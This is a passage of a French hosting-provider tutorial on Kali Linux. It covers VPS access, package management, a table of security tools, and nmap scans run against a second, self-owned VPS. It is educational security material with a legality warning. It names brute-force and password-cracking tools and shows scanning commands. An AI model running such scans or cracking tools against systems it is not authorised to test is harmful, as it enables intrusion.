{"id":38056,"date":"2025-02-04T20:10:04","date_gmt":"2025-02-04T20:10:04","guid":{"rendered":"\/tutoriels\/?p=38056"},"modified":"2025-04-23T18:33:03","modified_gmt":"2025-04-23T18:33:03","slug":"tutoriel-kali-linux","status":"publish","type":"post","link":"\/fr\/tutoriels\/tutoriel-kali-linux","title":{"rendered":"Tutoriel Kali Linux : commandes essentielles, gestion des outils Kali, ex\u00e9cution de scans"},"content":{"rendered":"<p>En tant que syst&egrave;me d&rsquo;exploitation ax&eacute; sur la s&eacute;curit&eacute;, Kali Linux vous permet d&rsquo;effectuer diverses t&acirc;ches, telles que les tests de p&eacute;n&eacute;tration, la criminalistique num&eacute;rique et l&rsquo;analyse de r&eacute;seau. Avec des centaines d&rsquo;outils de s&eacute;curit&eacute;, <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/kali-linux-cest-quoi\">Kali Linux<\/a> est id&eacute;al pour les sp&eacute;cialistes de la cybers&eacute;curit&eacute; et les passionn&eacute;s qui cherchent &agrave; &eacute;largir leurs comp&eacute;tences.<\/p><p>Si vous souhaitez utiliser Kali Linux mais ne savez pas par o&ugrave; commencer, vous &ecirc;tes au bon endroit. Dans cet article, vous apprendrez &agrave; ex&eacute;cuter Kali Linux sur un serveur priv&eacute; virtuel (VPS), &agrave; explorer ses commandes essentielles et &agrave; g&eacute;rer ses puissants outils.<\/p><p>Vous aurez &eacute;galement l&rsquo;occasion d&rsquo;acqu&eacute;rir une exp&eacute;rience pratique en menant des &eacute;valuations de s&eacute;curit&eacute;, depuis l&rsquo;ex&eacute;cution d&rsquo;analyses de r&eacute;seau jusqu&rsquo;&agrave; l&rsquo;exploitation des vuln&eacute;rabilit&eacute;s sur les syst&egrave;mes cibles. &Agrave; la fin de ce guide, vous serez pr&ecirc;t &agrave; utiliser Kali Linux pour tester et prot&eacute;ger votre environnement en toute confiance.<\/p><h2 class=\"wp-block-heading\" id=\"h-acceder-a-kali-linux\">Acc&eacute;der &agrave; Kali Linux<\/h2><p>La premi&egrave;re &eacute;tape pour d&eacute;marrer avec Kali Linux d&eacute;pend de l&rsquo;endroit o&ugrave; vous l&rsquo;avez install&eacute;. Par exemple, si vous avez <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/comment-installer-kali-linux\">install&eacute; Kali Linux<\/a> sur un ordinateur de bureau, il vous suffit d&rsquo;allumer l&rsquo;appareil et de vous connecter directement. En revanche, si vous avez install&eacute; le syst&egrave;me d&rsquo;exploitation sur le VPS d&rsquo;Hostinger, suivez plut&ocirc;t les &eacute;tapes suivantes :<\/p><ol class=\"wp-block-list\">\n<li>Connectez-vous &agrave; hPanel avec votre compte Hostinger et naviguez vers <strong>VPS &rarr; G&eacute;rer.<\/strong><\/li>\n\n\n\n<li>Dans votre tableau de bord VPS, recherchez la section <strong>Informations du VPS<\/strong> pour afficher vos identifiants SSH.<\/li>\n<\/ol><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd33f0\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1062\" height=\"341\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/public\" alt=\"Informations d'acc&egrave;s SSH dans le VPS de hPanel\" class=\"wp-image-40005\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/w=1062,fit=scale-down 1062w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/Capture-decran-2025-04-23-192901-04-23-2025_07_29_PM.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1062px) 100vw, 1062px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><ol start=\"3\" class=\"wp-block-list\">\n<li>Ouvrez votre terminal et ex&eacute;cutez la commande suivante, en rempla&ccedil;ant <strong>votre_adresse_ip_vps <\/strong>par l&rsquo;adresse IP r&eacute;elle de votre VPS :<\/li>\n<\/ol><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh root@votre_adresse_ip_vps<\/pre><p>Vous pouvez &eacute;galement cliquer sur le bouton <strong>Terminal de navigateur <\/strong>pour acc&eacute;der directement &agrave; votre VPS sans utiliser d&rsquo;autre application.<\/p><ol start=\"4\" class=\"wp-block-list\">\n<li>Vous serez invit&eacute; &agrave; saisir votre mot de passe. Saisissez-le soigneusement et appuyez sur <strong>Entr&eacute;e<\/strong>.<\/li>\n<\/ol><p>Une fois authentifi&eacute;, vous avez acc&egrave;s en ligne de commande &agrave; l&rsquo;environnement Kali Linux sur votre VPS.<\/p><figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.hostinger.com\/fr\/vps\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"300\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/public\" alt=\"\" class=\"wp-image-41471\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><h2 class=\"wp-block-heading\" id=\"h-commandes-essentielles-de-kali-linux\">Commandes essentielles de Kali Linux<\/h2><p>Kali Linux partage les m&ecirc;mes commandes que les autres distributions Linux pour la navigation, la manipulation de fichiers et la surveillance du syst&egrave;me. En tant que distribution bas&eacute;e sur Debian, elle utilise &eacute;galement des commandes de gestion de paquets similaires &agrave; celles d&rsquo;Ubuntu et d&rsquo;autres d&eacute;riv&eacute;s, notamment :<\/p><ul class=\"wp-block-list\">\n<li><strong>apt update <\/strong>&ndash; met &agrave; jour la liste des paquets disponibles.<\/li>\n\n\n\n<li><strong>apt upgrade <\/strong>&ndash; met &agrave; jour tous les paquets install&eacute;s.<\/li>\n\n\n\n<li><strong>apt install [nom_du_paquet] <\/strong>&ndash; installe un paquet sp&eacute;cifique.<\/li>\n\n\n\n<li><strong>apt remove [nom_du_paquet] <\/strong>&ndash; d&eacute;sinstalle un paquet.<\/li>\n<\/ul><p>Comme Kali Linux comprend des outils de test de s&eacute;curit&eacute; sp&eacute;cialis&eacute;s, vous voudrez les explorer au fil du temps. Voici quelques commandes essentielles pour utiliser ces outils :<\/p><figure tabindex=\"0\" class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>Outil<\/strong><\/td><td><strong>Commande<\/strong><\/td><td><strong>Utilisation<\/strong><\/td><\/tr><tr><td>Nmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nmap [ip_cible]<\/code><\/td><td>Analyse les r&eacute;seaux, les h&ocirc;tes et les services.<\/td><\/tr><tr><td>Metasploit<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">msfconsole<\/code><\/td><td>Lance la console Metasploit pour exploiter les vuln&eacute;rabilit&eacute;s du syst&egrave;me.<\/td><\/tr><tr><td>Aircrack-ng<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">aircrack-ng [options]<\/code><\/td><td>Effectue des tests de s&eacute;curit&eacute; Wi-Fi.<\/td><\/tr><tr><td>Wireshark<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">wireshark<\/code><\/td><td>Analyse le trafic r&eacute;seau.<\/td><\/tr><tr><td>Hydra<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">hydra [options]<\/code><\/td><td>Effectue des attaques par force brute sur les identifiants pour tester la robustesse des mots de passe.<\/td><\/tr><tr><td>John the Ripper<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">john [file]<\/code><\/td><td>Craque les hachages de mots de passe.<\/td><\/tr><tr><td>Nikto<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nikto -h [ip_cible]<\/code><\/td><td>Scanne les serveurs web pour trouver les vuln&eacute;rabilit&eacute;s.<\/td><\/tr><tr><td>SQLmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">sqlmap [options]<\/code><\/td><td>Teste les bases de donn&eacute;es pour les vuln&eacute;rabilit&eacute;s d&rsquo;injection SQL.<\/td><\/tr><tr><td>Lynis<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">lynis audit system<\/code><\/td><td>V&eacute;rifie les configurations de s&eacute;curit&eacute; du syst&egrave;me.<\/td><\/tr><tr><td>Snort<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">snort [options]<\/code><\/td><td>Surveille le trafic r&eacute;seau pour d&eacute;tecter toute activit&eacute; suspecte.<\/td><\/tr><\/tbody><\/table><\/figure><p>Pour travailler plus efficacement sous Kali Linux, pensez &agrave; apprendre ces raccourcis de ligne de commande utiles :<\/p><ul class=\"wp-block-list\">\n<li><strong>history <\/strong>&ndash; liste les commandes r&eacute;centes pour faciliter leur r&eacute;utilisation.<\/li>\n\n\n\n<li><strong>![number] <\/strong>&ndash; r&eacute;ex&eacute;cute une commande en fonction de son num&eacute;ro dans la liste historique.<\/li>\n\n\n\n<li><strong>clear <\/strong>&ndash; efface l&rsquo;&eacute;cran du terminal.<\/li>\n\n\n\n<li><strong>&ndash;help <\/strong>&ndash; fournit des informations sur l&rsquo;utilisation de la plupart des commandes.<\/li>\n<\/ul><h2 class=\"wp-block-heading\" id=\"h-gerer-les-outils-kali\">G&eacute;rer les outils Kali<\/h2><p>Kali Linux utilise des m&eacute;tapaquets pour installer des groupes d&rsquo;outils li&eacute;s pour des t&acirc;ches de s&eacute;curit&eacute; sp&eacute;cifiques. Si vous avez besoin de Kali Linux pour une t&acirc;che particuli&egrave;re, vous pouvez installer un m&eacute;tapaquet adapt&eacute; &agrave; cette t&acirc;che au lieu d&rsquo;installer l&rsquo;ensemble des outils.<\/p><p>Lorsque vous avez install&eacute; Kali Linux sur votre VPS, vous n&rsquo;avez re&ccedil;u que le paquet <strong>kali-linux-core <\/strong>contenant les outils essentiels. Pour v&eacute;rifier quels m&eacute;tapaquets et outils sont d&eacute;j&agrave; install&eacute;s, ex&eacute;cutez :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">apt list --installed | grep kali<\/pre><p>Voici le r&eacute;sultat attendu :<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd6e34\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"718\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-apt-list-output-installe.png\/public\" alt=\"La sortie de la commande apt list --installed\" class=\"wp-image-38078\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-apt-list-output-installe.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-apt-list-output-installe.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-apt-list-output-installe.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-apt-list-output-installe.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Si vous souhaitez installer des paquets suppl&eacute;mentaires, mettez d&rsquo;abord &agrave; jour le syst&egrave;me afin de maintenir la compatibilit&eacute; et d&rsquo;&eacute;viter les probl&egrave;mes de d&eacute;pendance :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt -y full-upgrade<\/pre><p>Ensuite, installez le m&eacute;tapaquet de votre choix. Dans cet exemple, nous utiliserons <strong>kali-linux-default<\/strong>, qui comprend divers outils populaires Kali Linux :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install -y kali-linux default<\/pre><p>Vous pouvez &eacute;galement installer d&rsquo;autres m&eacute;tapaquets en fonction de vos besoins. Voici quelques options :<\/p><ul class=\"wp-block-list\">\n<li><strong>kali-linux-headless <\/strong>&ndash; outils de base sans interface graphique, id&eacute;al pour les configurations VPS.<\/li>\n\n\n\n<li><strong>kali-linux-arm <\/strong>&ndash; outils optimis&eacute;s pour les appareils bas&eacute;s sur ARM.<\/li>\n\n\n\n<li><strong>kali-linux-nethunter <\/strong>&ndash; pour les tests de p&eacute;n&eacute;tration mobiles.<\/li>\n\n\n\n<li><strong>kali-tools-information-gathering <\/strong>&ndash; pour collecter des donn&eacute;es sur les cibles.<\/li>\n\n\n\n<li><strong>kali-tools-vulnerability <\/strong>&ndash; pour d&eacute;tecter et analyser les vuln&eacute;rabilit&eacute;s.<\/li>\n\n\n\n<li><strong>kali-tools-web <\/strong>&ndash; pour les tests de s&eacute;curit&eacute; des applications web.<\/li>\n\n\n\n<li><strong>kali-tools-passwords <\/strong>&ndash; pour tester et craquer les mots de passe.<\/li>\n\n\n\n<li><strong>kali-tools-database <\/strong>&ndash; pour &eacute;valuer la s&eacute;curit&eacute; des bases de donn&eacute;es.<\/li>\n\n\n\n<li><strong>kali-tools-wireless <\/strong>&ndash; pour tester la s&eacute;curit&eacute; des r&eacute;seaux sans fil.<\/li>\n\n\n\n<li><strong>kali-tools-reverse-engineering <\/strong>&ndash; pour d&eacute;construire et analyser les logiciels malveillants.<\/li>\n\n\n\n<li><strong>kali-tools-exploitation <\/strong>&ndash; pour exploiter les vuln&eacute;rabilit&eacute;s du syst&egrave;me.<\/li>\n\n\n\n<li><strong>kali-tools-social-engineering <\/strong>&ndash; pour les sc&eacute;narios d&rsquo;ing&eacute;nierie sociale.<\/li>\n\n\n\n<li><strong>kali-tools-sniffing-spoofing <\/strong>&ndash; pour d&eacute;tecter et imiter un trafic r&eacute;seau suspect.<\/li>\n\n\n\n<li><strong>kali-tools-post-exploitation <\/strong>&ndash; pour s&eacute;curiser l&rsquo;acc&egrave;s apr&egrave;s l&rsquo;exploitation.<\/li>\n\n\n\n<li><strong>kali-tools-forensics <\/strong>&ndash; pour la criminalistique num&eacute;rique et les enqu&ecirc;tes.<\/li>\n\n\n\n<li><strong>kali-tools-reporting <\/strong>&ndash; pour documenter et rapporter les r&eacute;sultats.<\/li>\n<\/ul><p>Si vous pr&eacute;f&eacute;rez, vous pouvez &eacute;galement installer des outils individuels. Par exemple :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install nmap<\/pre><p>Inversement, si vous trouvez certains outils inutiles et que vous souhaitez lib&eacute;rer de l&rsquo;espace, vous pouvez les supprimer individuellement :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [nom_de_l'outil]<\/pre><p>Ou, si vous n&rsquo;avez plus besoin d&rsquo;un m&eacute;tapaquet entier, supprimez-le avec :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [nom_du_m&eacute;tapaquet]<\/pre><h2 class=\"wp-block-heading\" id=\"h-utiliser-kali-linux-pour-les-tests-de-securite\">Utiliser Kali Linux pour les tests de s&eacute;curit&eacute;<\/h2><p>Cette section montre comment effectuer des tests de s&eacute;curit&eacute; en utilisant notre VPS Kali Linux comme machine d&rsquo;attaque et un autre VPS avec Ubuntu <strong>24.04 <\/strong>comme syst&egrave;me cible.<\/p><p>Pour les deux serveurs, nous utilisons des plans du <a href=\"\/fr\/vps\">VPS de Hostinger<\/a>. <\/p><p>Pour la machine d&rsquo;attaque, nous avons choisi le plan <strong>KVM 1<\/strong>, qui offre <strong>4 Go <\/strong>de<strong> <\/strong>RAM et <strong>50 Go <\/strong>de stockage NVMe pour <strong>\u20ac5.49\/mois <\/strong>&ndash; ce qui r&eacute;pond aux exigences minimales de Kali Linux.<\/p><p>En ce qui concerne le syst&egrave;me cible, vous pouvez choisir n&rsquo;importe quel plan, mais nous avons d&eacute;cid&eacute; d&rsquo;utiliser le m&ecirc;me plan <strong>KVM 1.<\/strong><\/p><p>\n\n\n    <p class=\"warning\">\n        <strong>Avertissement !<\/strong> Assurez-vous toujours que vous avez la permission de tester un serveur ou un r&eacute;seau. Les <strong>tests non autoris&eacute;s sont ill&eacute;gaux et contraires &agrave; l'&eacute;thique<\/strong>. Dans notre cas, nous pouvons pratiquer librement puisque nous poss&eacute;dons les deux instances VPS.    <\/p>\n    \n\n\n\n<\/p><h3 class=\"wp-block-heading\" id=\"h-executer-des-analyses-de-reseau-avec-nmap\">Ex&eacute;cuter des analyses de r&eacute;seau avec Nmap<\/h3><p>Nmap est un outil de scan de r&eacute;seau pour l&rsquo;&eacute;valuation des vuln&eacute;rabilit&eacute;s. Puisque vous utilisez deux serveurs distincts comme machine d&rsquo;attaque et syst&egrave;me cible, vous &ecirc;tes parfaitement pr&eacute;par&eacute; pour la d&eacute;couverte et la cartographie du r&eacute;seau &agrave; l&rsquo;aide de Nmap. Voici comment proc&eacute;der :<\/p><p><strong>Scan de base de Nmap<\/strong><\/p><p>Pour commencer par un simple scan, ex&eacute;cutez :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap [ip_cible]<\/pre><p>Remplacez <strong>[ip_cible] <\/strong>par l&rsquo;adresse IP de votre VPS cible. Pour les utilisateurs de Hostinger, vous pouvez trouver l&rsquo;IP du serveur dans hPanel en acc&eacute;dant &agrave; la section<strong> Informations VPS<\/strong> de votre tableau de bord.<\/p><p>Lorsqu&rsquo;elle est ex&eacute;cut&eacute;e, cette commande<\/p><ul class=\"wp-block-list\">\n<li>D&eacute;couvre les ports ouverts sur la cible.<\/li>\n\n\n\n<li>Identifie les services actifs.<\/li>\n\n\n\n<li>Fournit des informations pr&eacute;liminaires sur les services.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd7c52\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"300\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-terminal.png\/public\" alt=\"La sortie de la commande nmap\" class=\"wp-image-38079\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>D&eacute;tection des services et des versions<\/strong><\/p><p>Pour obtenir des informations suppl&eacute;mentaires sur les services fonctionnant sur des ports ouverts, proc&eacute;dez comme suit :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sV [ip_cible]<\/pre><p>Cette commande active la d&eacute;tection de la version pour chaque service, ce qui vous aide &agrave; identifier les &eacute;ventuelles vuln&eacute;rabilit&eacute;s dans des versions sp&eacute;cifiques de logiciels.<\/p><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474dd833d\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"144\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-sv-terminal.png\/public\" alt=\"La sortie de la commande nmap -sV\" class=\"wp-image-38080\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-sv-terminal.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-sv-terminal.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-sv-terminal.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-nmap-sv-terminal.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>D&eacute;tection du syst&egrave;me d&rsquo;exploitation<\/strong><\/p><p>Pour d&eacute;terminer le syst&egrave;me d&rsquo;exploitation en 